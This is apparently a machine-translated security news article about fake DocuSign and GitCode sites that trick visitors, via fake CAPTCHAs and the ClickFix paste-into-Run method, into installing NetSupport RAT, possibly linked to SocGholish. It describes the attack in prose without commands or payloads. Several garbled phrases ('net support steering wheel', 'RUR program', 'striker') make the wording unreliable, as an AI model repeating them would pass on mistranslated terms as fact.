- Threat actors create fake docusign and gitcode -sites
- The websites come with fake CAPTCHA and other scam mechanisms
- Victims are fooled to download a Trojan
Security researchers have found false gitcode and docusign sites that distribute remote access Trojan (rat) malware using the infamous clickfix method.
Experts from Domaintool’s Investigations (DTI) found “malicious multi-stage downloader Powershell scripts” who hosted spoofed sites inviting visitors to pull up Windows Run Terminal and run a script copied to their clipboard.
“After doing so, the Powershell script downloads another downloader script and is performed on the system, which in turn will retrieve a payload and eventually performs them installation of net support steering wheel on the infected machines,” the researchers said in their report. These multiple phases and downloads are designed to avoid detection and help the campaign “Be more resistant to security surveys and removal.”
Socgholish
They also said they don’t know exactly how the victims end up on these sites. However, it is safe to assume that social engineering, e -mail spam and possibly malvertising are part of the methodology. In some cases, the fake sites also come with a fake CAPTCHA verification mechanism that needs to be solved, the victims require copies and inserts a code into the RUR program that effectively downloads malware.
TDI could not confirm the striker’s identity, but emphasized that it had observed a similar campaign late in 2024, which was attributed to socholish:
“In particular, the techniques involved are common, and Netsupport Manager is a legitimate management tool known to be geared as a rat of several threat groups such as Fin7, Scarlet Goldfinch, Storm-0408 and others,” the report concluded.
Socgholish, also known as FakeupDates, is known for its fake browser and fake software update alarms. After compromising a site, Crooks would inject a popup and notify visitors that their browser or operating system needs “fixation” or “update”.
This is the “original” clickfix method, one that spun from the old “you have a virus” popup that imitated popular antivirus programs and provided -viruses.
Via Hacker the news
